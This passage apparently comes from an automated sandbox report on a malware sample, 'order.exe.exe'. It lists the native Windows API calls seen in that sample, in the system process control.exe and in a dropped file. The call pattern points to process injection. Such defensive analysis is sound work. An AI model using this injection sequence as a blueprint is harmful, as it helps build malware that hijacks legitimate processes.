      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021829FE NtProtectVirtualMemory,0_2_021829FE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02180F63 NtWriteVirtualMemory,0_2_02180F63
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02181187 NtWriteVirtualMemory,0_2_02181187
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_02182DD7 NtResumeThread,0_2_02182DD7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021801C7 NtSetInformationThread,TerminateProcess,0_2_021801C7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 0_2_021829FF NtProtectVirtualMemory,0_2_021829FF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA700 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1F1CA700
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA720 NtResumeThread,LdrInitializeThunk,1_2_1F1CA720
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA750 NtCreateFile,LdrInitializeThunk,1_2_1F1CA750
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA610 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1F1CA610
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA6A0 NtCreateSection,LdrInitializeThunk,1_2_1F1CA6A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA540 NtDelayExecution,LdrInitializeThunk,1_2_1F1CA540
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA560 NtQuerySystemInformation,LdrInitializeThunk,1_2_1F1CA560
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA5F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1F1CA5F0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA410 NtQueryInformationToken,LdrInitializeThunk,1_2_1F1CA410
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA480 NtMapViewOfSection,LdrInitializeThunk,1_2_1F1CA480
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA4A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1F1CA4A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA360 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1F1CA360
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA3E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1F1CA3E0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA240 NtReadFile,LdrInitializeThunk,1_2_1F1CA240
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA2D0 NtClose,LdrInitializeThunk,1_2_1F1CA2D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA710 NtQuerySection,1_2_1F1CA710
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA780 NtOpenDirectoryObject,1_2_1F1CA780
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA650 NtQueueApcThread,1_2_1F1CA650
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA6D0 NtCreateProcessEx,1_2_1F1CA6D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA520 NtEnumerateKey,1_2_1F1CA520
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CBD40 NtSuspendThread,1_2_1F1CBD40
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA5A0 NtWriteVirtualMemory,1_2_1F1CA5A0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB410 NtOpenProcessToken,1_2_1F1CB410
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA430 NtQueryVirtualMemory,1_2_1F1CA430
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA470 NtSetInformationFile,1_2_1F1CA470
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB470 NtOpenThread,1_2_1F1CB470
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA460 NtOpenProcess,1_2_1F1CA460
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CACE0 NtCreateMutant,1_2_1F1CACE0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA310 NtEnumerateValueKey,1_2_1F1CA310
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA350 NtQueryValueKey,1_2_1F1CA350
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA370 NtQueryInformationProcess,1_2_1F1CA370
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA3D0 NtCreateKey,1_2_1F1CA3D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CBA30 NtSetContextThread,1_2_1F1CBA30
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA220 NtWaitForSingleObject,1_2_1F1CA220
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA260 NtWriteFile,1_2_1F1CA260
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA2F0 NtQueryInformationFile,1_2_1F1CA2F0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CA800 NtSetValueKey,1_2_1F1CA800
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1CB0B0 NtGetContextThread,1_2_1F1CB0B0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005629FE NtProtectVirtualMemory,1_2_005629FE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005601C7 NtSetInformationThread,1_2_005601C7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_005629FF NtProtectVirtualMemory,1_2_005629FF
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_00560301 NtProtectVirtualMemory,1_2_00560301
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_00560333 NtProtectVirtualMemory,1_2_00560333
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A480 NtMapViewOfSection,LdrInitializeThunk,8_2_0489A480
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489ACE0 NtCreateMutant,LdrInitializeThunk,8_2_0489ACE0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A410 NtQueryInformationToken,LdrInitializeThunk,8_2_0489A410
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A470 NtSetInformationFile,LdrInitializeThunk,8_2_0489A470
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A540 NtDelayExecution,LdrInitializeThunk,8_2_0489A540
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A560 NtQuerySystemInformation,LdrInitializeThunk,8_2_0489A560
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A6A0 NtCreateSection,LdrInitializeThunk,8_2_0489A6A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A610 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0489A610
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A750 NtCreateFile,LdrInitializeThunk,8_2_0489A750
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A800 NtSetValueKey,LdrInitializeThunk,8_2_0489A800
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A2D0 NtClose,LdrInitializeThunk,8_2_0489A2D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A240 NtReadFile,LdrInitializeThunk,8_2_0489A240
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A260 NtWriteFile,LdrInitializeThunk,8_2_0489A260
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A3D0 NtCreateKey,LdrInitializeThunk,8_2_0489A3D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A3E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0489A3E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A310 NtEnumerateValueKey,LdrInitializeThunk,8_2_0489A310
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A350 NtQueryValueKey,LdrInitializeThunk,8_2_0489A350
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A360 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_0489A360
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A4A0 NtUnmapViewOfSection,8_2_0489A4A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489B410 NtOpenProcessToken,8_2_0489B410
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A430 NtQueryVirtualMemory,8_2_0489A430
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A460 NtOpenProcess,8_2_0489A460
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489B470 NtOpenThread,8_2_0489B470
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A5A0 NtWriteVirtualMemory,8_2_0489A5A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A5F0 NtReadVirtualMemory,8_2_0489A5F0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A520 NtEnumerateKey,8_2_0489A520
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489BD40 NtSuspendThread,8_2_0489BD40
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A6D0 NtCreateProcessEx,8_2_0489A6D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A650 NtQueueApcThread,8_2_0489A650
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A780 NtOpenDirectoryObject,8_2_0489A780
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A700 NtProtectVirtualMemory,8_2_0489A700
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A710 NtQuerySection,8_2_0489A710
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A720 NtResumeThread,8_2_0489A720
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489B0B0 NtGetContextThread,8_2_0489B0B0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A2F0 NtQueryInformationFile,8_2_0489A2F0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A220 NtWaitForSingleObject,8_2_0489A220
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489BA30 NtSetContextThread,8_2_0489BA30
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0489A370 NtQueryInformationProcess,8_2_0489A370
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00579830 NtCreateFile,8_2_00579830
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_005798E0 NtReadFile,8_2_005798E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00579960 NtClose,8_2_00579960
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00579A10 NtAllocateVirtualMemory,8_2_00579A10
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0057982B NtCreateFile,8_2_0057982B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0057995B NtClose,8_2_0057995B
      Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00579A0A NtAllocateVirtualMemory,8_2_00579A0A
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D0F70 NtWriteVirtualMemory,17_2_020D0F70
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D29FE NtProtectVirtualMemory,17_2_020D29FE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D0F63 NtWriteVirtualMemory,17_2_020D0F63
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D1187 NtWriteVirtualMemory,17_2_020D1187
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D01C7 NtSetInformationThread,TerminateProcess,17_2_020D01C7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 17_2_020D29FF NtProtectVirtualMemory,17_2_020D29FF
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_02050F70 NtWriteVirtualMemory,18_2_02050F70
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_02052DAB NtResumeThread,18_2_02052DAB
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_020529FE NtProtectVirtualMemory,18_2_020529FE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_02050F63 NtWriteVirtualMemory,18_2_02050F63
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_02051187 NtWriteVirtualMemory,18_2_02051187
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_020501C7 NtSetInformationThread,TerminateProcess,18_2_020501C7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_02052DD7 NtResumeThread,18_2_02052DD7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 18_2_020529FF NtProtectVirtualMemory,18_2_020529FF
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E0F70 NtWriteVirtualMemory,19_2_006E0F70
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E29FE NtProtectVirtualMemory,19_2_006E29FE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E2DAB NtResumeThread,19_2_006E2DAB
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E0F63 NtWriteVirtualMemory,19_2_006E0F63
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E29FF NtProtectVirtualMemory,19_2_006E29FF
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E01C7 NtSetInformationThread,TerminateProcess,19_2_006E01C7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E2DD7 NtResumeThread,19_2_006E2DD7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 19_2_006E1187 NtWriteVirtualMemory,19_2_006E1187
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A720 NtResumeThread,LdrInitializeThunk,20_2_1F32A720
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A700 NtProtectVirtualMemory,LdrInitializeThunk,20_2_1F32A700
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A750 NtCreateFile,LdrInitializeThunk,20_2_1F32A750
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A610 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_1F32A610
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A6A0 NtCreateSection,LdrInitializeThunk,20_2_1F32A6A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A560 NtQuerySystemInformation,LdrInitializeThunk,20_2_1F32A560
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A540 NtDelayExecution,LdrInitializeThunk,20_2_1F32A540
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A5F0 NtReadVirtualMemory,LdrInitializeThunk,20_2_1F32A5F0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A410 NtQueryInformationToken,LdrInitializeThunk,20_2_1F32A410
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A4A0 NtUnmapViewOfSection,LdrInitializeThunk,20_2_1F32A4A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A480 NtMapViewOfSection,LdrInitializeThunk,20_2_1F32A480
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A360 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_1F32A360
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A3E0 NtFreeVirtualMemory,LdrInitializeThunk,20_2_1F32A3E0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A240 NtReadFile,LdrInitializeThunk,20_2_1F32A240
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A2D0 NtClose,LdrInitializeThunk,20_2_1F32A2D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A710 NtQuerySection,20_2_1F32A710
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A780 NtOpenDirectoryObject,20_2_1F32A780
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A650 NtQueueApcThread,20_2_1F32A650
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A6D0 NtCreateProcessEx,20_2_1F32A6D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A520 NtEnumerateKey,20_2_1F32A520
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32BD40 NtSuspendThread,20_2_1F32BD40
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A5A0 NtWriteVirtualMemory,20_2_1F32A5A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A430 NtQueryVirtualMemory,20_2_1F32A430
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32B410 NtOpenProcessToken,20_2_1F32B410
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A470 NtSetInformationFile,20_2_1F32A470
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32B470 NtOpenThread,20_2_1F32B470
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A460 NtOpenProcess,20_2_1F32A460
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32ACE0 NtCreateMutant,20_2_1F32ACE0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A310 NtEnumerateValueKey,20_2_1F32A310
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A370 NtQueryInformationProcess,20_2_1F32A370
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A350 NtQueryValueKey,20_2_1F32A350
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A3D0 NtCreateKey,20_2_1F32A3D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32BA30 NtSetContextThread,20_2_1F32BA30
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A220 NtWaitForSingleObject,20_2_1F32A220
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A260 NtWriteFile,20_2_1F32A260
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A2F0 NtQueryInformationFile,20_2_1F32A2F0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32A800 NtSetValueKey,20_2_1F32A800
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_1F32B0B0 NtGetContextThread,20_2_1F32B0B0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_005629FE NtProtectVirtualMemory,20_2_005629FE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_00562DAB NtSetInformationThread,20_2_00562DAB
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_005601C7 NtSetInformationThread,20_2_005601C7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_005629FF NtProtectVirtualMemory,20_2_005629FF
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_00560301 NtProtectVirtualMemory,20_2_00560301
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_00560333 NtProtectVirtualMemory,20_2_00560333
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 20_2_00562DD7 NtSetInformationThread,20_2_00562DD7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A720 NtResumeThread,LdrInitializeThunk,21_2_1F31A720
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A700 NtProtectVirtualMemory,LdrInitializeThunk,21_2_1F31A700
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A750 NtCreateFile,LdrInitializeThunk,21_2_1F31A750
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A610 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_1F31A610
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A6A0 NtCreateSection,LdrInitializeThunk,21_2_1F31A6A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A560 NtQuerySystemInformation,LdrInitializeThunk,21_2_1F31A560
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A540 NtDelayExecution,LdrInitializeThunk,21_2_1F31A540
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A5F0 NtReadVirtualMemory,LdrInitializeThunk,21_2_1F31A5F0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A410 NtQueryInformationToken,LdrInitializeThunk,21_2_1F31A410
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A4A0 NtUnmapViewOfSection,LdrInitializeThunk,21_2_1F31A4A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A480 NtMapViewOfSection,LdrInitializeThunk,21_2_1F31A480
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A360 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_1F31A360
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A3E0 NtFreeVirtualMemory,LdrInitializeThunk,21_2_1F31A3E0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A240 NtReadFile,LdrInitializeThunk,21_2_1F31A240
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A2D0 NtClose,LdrInitializeThunk,21_2_1F31A2D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A710 NtQuerySection,21_2_1F31A710
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A780 NtOpenDirectoryObject,21_2_1F31A780
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A650 NtQueueApcThread,21_2_1F31A650
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A6D0 NtCreateProcessEx,21_2_1F31A6D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A520 NtEnumerateKey,21_2_1F31A520
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31BD40 NtSuspendThread,21_2_1F31BD40
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A5A0 NtWriteVirtualMemory,21_2_1F31A5A0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A430 NtQueryVirtualMemory,21_2_1F31A430
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31B410 NtOpenProcessToken,21_2_1F31B410
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31B470 NtOpenThread,21_2_1F31B470
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A470 NtSetInformationFile,21_2_1F31A470
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A460 NtOpenProcess,21_2_1F31A460
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31ACE0 NtCreateMutant,21_2_1F31ACE0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A310 NtEnumerateValueKey,21_2_1F31A310
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A370 NtQueryInformationProcess,21_2_1F31A370
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A350 NtQueryValueKey,21_2_1F31A350
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A3D0 NtCreateKey,21_2_1F31A3D0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31BA30 NtSetContextThread,21_2_1F31BA30
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A220 NtWaitForSingleObject,21_2_1F31A220
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A260 NtWriteFile,21_2_1F31A260
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A2F0 NtQueryInformationFile,21_2_1F31A2F0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31A800 NtSetValueKey,21_2_1F31A800
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_1F31B0B0 NtGetContextThread,21_2_1F31B0B0
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_005629FE NtProtectVirtualMemory,21_2_005629FE
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_00562DAB NtSetInformationThread,21_2_00562DAB
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_005601C7 NtSetInformationThread,21_2_005601C7
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_005629FF NtProtectVirtualMemory,21_2_005629FF
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_00560301 NtProtectVirtualMemory,21_2_00560301
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_00560333 NtProtectVirtualMemory,21_2_00560333
      Source: C:\Program Files (x86)\Gmd1\olotql9xtrtpnd.exeCode function: 21_2_00562DD7 NtSetInformationThread,21_2_00562DD7
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2517461_2_1F251746
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1A57901_2_1F1A5790
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2427821_2_1F242782
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1867D01_2_1F1867D0
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F251FCE1_2_1F251FCE
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B66111_2_1F1B6611
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F24CE661_2_1F24CE66
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1A76401_2_1F1A7640
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B5E701_2_1F1B5E70
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F1B4E611_2_1F1B4E61
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F243E961_2_1F243E96
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F2526F81_2_1F2526F8
      Source: C:\Users\user\Desktop\order.exe.exeCode function: 1_2_1F22C53F1_2_1F22C53F
